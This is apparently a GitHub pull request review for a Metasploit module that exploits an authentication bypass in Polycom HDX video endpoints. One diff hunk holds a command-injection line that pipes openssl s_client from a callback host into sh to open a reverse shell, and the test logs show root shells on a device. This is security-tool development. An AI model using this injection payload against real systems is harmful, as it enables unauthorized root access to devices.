### PR TITLE
Polycom hdx #4096

### PR DESCRIPTION
**Pull request by h00die**
Adds module found in EDB but not in MSF.  Ticket #4096 

Unfortunately, I don't own a polycom HDX, don't know where to find one, and they're too expensive.  I'm simply trying to get the module pushed in to help get that old request tackled.  Hopefully someone can find one to test with!

Also, I'm not very ruby (yeah python), so I got most of the rubocop issues fixed, but some were a little more ruby than I'd like to change and have confidence I didn't break the code.  Commit 1 is the original, commit 2 is rubocop/msftidy enhanced, so if anything looks strange, check commit 1.

### CODE REVIEW

**Comment by h00die** [comment]
Did want to note that since I didn't write the code, I didn't feel right about removing the license which causes an msftidy warning.

**Comment by wchen-r7** [comment]
You can clear the msftidy/travis error by using this header:

```
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
```

But that actually should not mean anything different since the module is already on MSF_LICENSE.

File: modules/exploits/unix/misc/psh_auth_bypass.rb [hunk 1]
```diff
@@ -0,0 +1,246 @@
...
+        OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),
+        OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])
+      ], self.class
+    )
+  end
+
+  def check
+    connect
+    sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n")
+    ::IO.select(nil, nil, nil, 1)
```
Comment (wvu-r7) [inline modules/exploits/unix/misc/psh_auth_bypass.rb]: You can use ```Rex.sleep(1)```.

File: modules/exploits/unix/misc/psh_auth_bypass.rb [hunk 2]
```diff
@@ -0,0 +1,246 @@
...
+        t = cur_threads[ti]
+        unless t.alive?
+          cur_threads[ti] = nil
+        end
+      end
+
+      # Remove any dead threads from the set
+      cur_threads.delete(nil)
+
+      ::IO.select(nil, nil, nil, 0.25)
```
Comment (wvu-r7) [inline modules/exploits/unix/misc/psh_auth_bypass.rb]: You can use ```Rex.sleep(0.25)```.

File: modules/exploits/unix/misc/psh_auth_bypass.rb [hunk 3]
```diff
@@ -0,0 +1,246 @@
...
+    # Figure out the port we picked
+    cbport = service.getsockname[2]
+
+    # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
+    cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n"
+    sock.put(cmd)
+
+    # Give time for our command to be queued and executed
+    1.upto(5) do
+      ::IO.select(nil, nil, nil, 1)
```
Comment (wvu-r7) [inline modules/exploits/unix/misc/psh_auth_bypass.rb]: You can use ```Rex.sleep(1)```.

**Comment by h00die** [comment]
anyone have a polycom hdx to test this on?  Ticket is a month old now...

**Comment by bcook-r7** [comment]
I have a Polycom Soundstation IP 7000 to play with now. Can I test anything here?

**Comment by h00die** [comment]
go for it!

**Comment by bcook-r7** [comment]
My target system is not the right kind of thing for this unfortunately, so it isn't going to work.

Could I do something odd and slip this in anyway, because I suspect that it'll be useful by the time someone finds one in the field (and having it in this PR won't be helpful at that point)?

**Comment by h00die** [comment]
Lets do a docs for it first to make note of these things.  Either I can write it up in ~30min, or you can after the PR.  just let me know!

**Comment by busterb** [comment]
Please do, I think that works.

**Comment by h00die** [comment]
My plan was by the end of the weekend to have a PR that has docs for #6960 #4888 #5697 #6731 so you're just a few days ahead of me

**Comment by h00die** [comment]
@bcook-r7 and there she is, ready to go!

**Comment by bcook-r7** [comment]
I happened to find an actual Polycom HDX on Friday as well; shall also give this a try if I can.

**Comment by h00die** [comment]
Feel free to mail it to me and I'll do the testing :)

**Comment by busterb** [comment]
close
```
[*] Started reverse double SSL handler on 192.168.1.120:4444
[*] 192.168.1.155:23 - Starting Authentication bypass with 6 threads with 100 max connections
[+] 192.168.1.155:23 - 192.168.1.155:23 Successfully exploited the authentication bypass flaw
[-] 192.168.1.155:23 - Exploit failed: NoMethodError undefined method `getsockname' for nil:NilClass
[*] Exploit completed, but no session was created.
```

**Comment by h00die** [comment]
Maybe when I was rubocop-ing I messed something up?

**Comment by bcook-r7** [comment]
I think it's my fault - I had an option set incorrectly (can add some checks for that). First, let's try the original module.
```
msf exploit(psh_auth_bypass) > run

[*] Started reverse double SSL handler on 192.168.1.120:4444
[*] 192.168.1.155:23 - Starting Authentication bypass with 6 threads with 100 max connections
[+] 192.168.1.155:23 - 192.168.1.155:23 Successfully exploited the authentication bypass flaw
[+] 192.168.1.155:23 - Sending payload of 178 bytes to 192.168.1.155:39712...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo OZ0Ug10UafQyH04K;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "OZ0Ug10UafQyH04K\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (192.168.1.120:4444 -> 192.168.1.155:34219) at 2016-08-01 13:36:16 -0500
[*] 192.168.1.155:23 - Shutting down payload stager listener...


uname -a
Linux polycom.lan 2.6.33.3-rt17.p2.25 #1 PREEMPT RT Wed Aug 3 14:08:40 CDT 2011 ppc unknown
whoami
root
```

**Comment by bcook-r7** [comment]
I take it back, yeah, it's a cleanup commit. Same params fails with head on this PR.

**Comment by bcook-r7** [comment]
fixed it! self.session really was required
```
msf exploit(psh_auth_bypass) > use exploit/unix/misc/psh_auth_bypass
msf exploit(psh_auth_bypass) > run

[*] Started reverse double SSL handler on 192.168.1.120:4444
[*] 192.168.1.155:23 - Starting Authentication bypass with 6 threads with 100 max connections
[+] 192.168.1.155:23 - 192.168.1.155:23 Successfully exploited the authentication bypass flaw
[+] 192.168.1.155:23 - Sending payload of 178 bytes to 192.168.1.155:40186...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xInxktvgUmm7hPyh;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "xInxktvgUmm7hPyh\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.120:4444 -> 192.168.1.155:37728) at 2016-08-01 13:49:06 -0500
[*] 192.168.1.155:23 - Shutting down payload stager listener...

whoami
root
uname -a
Linux polycom.lan 2.6.33.3-rt17.p2.25 #1 PREEMPT RT Wed Aug 3 14:08:40 CDT 2011 ppc unknown
pwd
/opt/polycom/bin
```

**Comment by bcook-r7** [comment]
I added b34201e 50c918f 5309f2e

**Comment by bcook-r7** [comment]
## Release Notes

**Polycom Command Shell Authorization Bypass** The login component of the Polycom Command Shell on Polycom HDX video endpints, running software versions 3.0.5 and earlier,
 is vulnerable to an authorization bypass when simultaneous connections are made to the service, allowing remote network attackers to gain access to a sandboxed telnet prompt without
 authentication.

**Comment by bcook-r7** [comment]
thanks @h00die

**Pull request merged**